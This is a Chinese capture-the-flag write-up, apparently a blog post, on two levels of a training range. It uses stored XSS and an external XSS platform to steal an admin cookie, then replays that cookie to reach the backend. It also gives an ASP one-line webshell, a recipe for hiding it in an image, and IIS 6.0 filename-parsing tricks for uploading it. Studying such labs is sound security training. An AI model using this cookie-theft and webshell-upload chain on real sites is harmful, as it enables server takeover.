靶场链接:https://hack.zkaq.cn/

文章目录

  • 前言
  • 四、为了更多的权限!留言板!
  • 五、进击!拿到Web最高权限!
  • 总结

前言

本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以后做了再写上来


第一章是简单的sql注入。第二章我的ModHeader似乎不起作用。。也没有做出来

四、为了更多的权限!留言板!

传送门:http://59.63.200.79:8004/Feedback.asp

Tips:
      1、存储型Xss
      2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面
      3、自建Xss平台源码:http://www.zkaq.org/?t/99.html
经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站!
他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。
尤里开始动手……

打开网站,从tips可以知道留言板功能存在存储型XSS,在留言板的各个输入框都输入以下代码进行测试

 <script>alert("XSS")</script>

发现有xss弹窗,这里我们在XSS平台上创建一个项目(平台链接:https://xss.pt/xss.php)

创建好后,勾选前两项


复制代码到可能存在注入的地方,然后回到XSS平台发现收到注入反馈


发现flag,提交

五、进击!拿到Web最高权限!

传送门:http://59.63.200.79:8005/admin/default.asp

Tips:
      1、通过修改Cookie登录后台(没用重打)
      2、上传SHELL!
      3、Flag在web根目录(flag.php)
      4、上传图片时建议上传小文件,我建议用QQ表情
      尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,看到了后台功能!
      接下来要做的,就是找一个上传点,上传自己的shell了!

1、在XSS平台拿到第四关的cookie,删去flag=zkz{…},修改cookie,点击“准备好了吗”或者刷新进入后台

2、寻找上传点

在产品管理-添加产品中可以上传文件:

3、上传asp一句话图片木马

  • 如何制作asp图片木马:
    (1)找一张图片,名字改成1.jpg
    (2)<%eval request(“pass”)%>存为1.asp 其中request为函数,pass是密码
    (3)copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件(当前文件夹下cmd)

复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片,运行1.bat,就会出现一个图片asp.jpg,现在这个asp.jpg就是已经做好的木马了。

(本来是asp.jpg,后面连接蚁剑有IIS解析漏洞,所以改成了.cer)

上传成功

4、蚁剑连接

405错误,IIS/6.0

  • IIS解析漏洞
  • 目录解析
    以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
  • 文件解析
    对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
  • IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx


将图片木马后缀改为.cer再次上传

500错误,检查了一下shell type是php没有改成asp,重新选择后连接成功

找到flag.txt文件,打开得到flag

六七八九


总结

还要再加强,知识太匮乏了

封神台-尤里的复仇Ⅰ相关推荐

  1. 封神台----尤里的复仇I-第一章:为了女神小芳

    1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数.报显示位 ?id=1 order by 2 ------查询了两列 ?i ...

  2. 封神台-尤里的复仇II 回归sql-注入绕过防护getshell

    http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz 直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描 1.在用户名处加上' ...

  3. 封神台----尤里的复仇I-第四章:为了更多的权限!留言板!!

    本章主要是xss平台使用,很简单. 自己搭建xss平台或者网上随便找个平台注册使用. 新建个项目,建好后,将下面代码复制到留言板里. 提交,即可.去XSS平台接收消息. 提交,完成.

  4. 封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客

    无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用.因为有了点基础在此写下payload只保证自己可以看得懂. 第一章:为了女神小芳! ?id=1 and ...

  5. 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章

    [封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...

  6. 封神台-第二章 尤里的复仇

    封神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...

  7. 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章

    [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 第一章:为了女神小芳 SQL注入攻击原理实战演练 第二章: ...

  8. 封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】

    尤里的复仇Ⅰ 小芳![8题] 第一章:为了女神小芳! 第二章:遇到阻难!绕过WAF过滤! 第三章:为了更多的权限!留言板! 第四章:进击!拿到Web最高权限! 第五章:SYSTEM!POWER! 第六 ...

  9. 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

    封神台 https://hack.zkaq.cn 一.1.通过修改Cookie登录后台(没用重打)         2,上传SHELL!3,Flag在网站根目录(flag.php)         3 ...

最新文章

  1. Codeforces Round #658 (Div. 2)部分题解
  2. phpHiveAdmin开发两个月记录
  3. Struts2 配置文件手册
  4. Shell命令-文件及目录操作之chattr、lsattr
  5. tensorrt轻松部署高性能dnn推理_部署环境之:tensorRT的插件
  6. dbscan用 java代码_聚类算法之DBScan(Java实现)[转]
  7. java学习(138):异常处理
  8. spring bean的创建,生命周期
  9. 乳化液稳定剂php,乳化液稳定剂PHP对小于0.1mm煤泥浮选的影响
  10. Install R language on Linux RHEL5 or RHEL6
  11. 逍遥单机卡系统服务器ip,逍遥剑侠情缘私服架设源码+APP端+搭建教程
  12. 扑克类游戏斗地主、蜘蛛纸牌源码
  13. HYSPLIT模式简介及使用
  14. php 客服工单分配问题,最全客服工单系统功能介绍
  15. vue tab页面缓存处理
  16. 无法访问yunlong.wj0920wjx.net指向的web服务器(或虚拟主机)的目录,请检查网络设置
  17. JAVA校招基础面试题
  18. 【无标题】前端电子签名的canvas画板
  19. python 蟒蛇程序详解_软件测试学习教程——【大蟒蛇】python基础
  20. Linux企业化运维--(7)redis服务之redis配置及主从复制、主从自动切换、集群、redis+mysql、gearman实现数据同步

热门文章

  1. FPGA基本引脚知识
  2. 国内移动应用开发平台哪家强?
  3. 跟尤雨溪一起解读Vue3源码笔记- Vue Mastery
  4. vue 外部字体图标使用,无须绝对路径引入办法
  5. Yann LeCun,牛人也!
  6. 【快直播android demo】SDP交互
  7. 描述你所用计算机,你说的描述电脑问题是什么意思啊 爱问知识人
  8. Linux:使用云盘
  9. Git 操作遇到 Found a swap file by the name “~/xxxx/.git/. COMMIT_EDI_TMSG. Swp“
  10. 中国历史“四大谜案”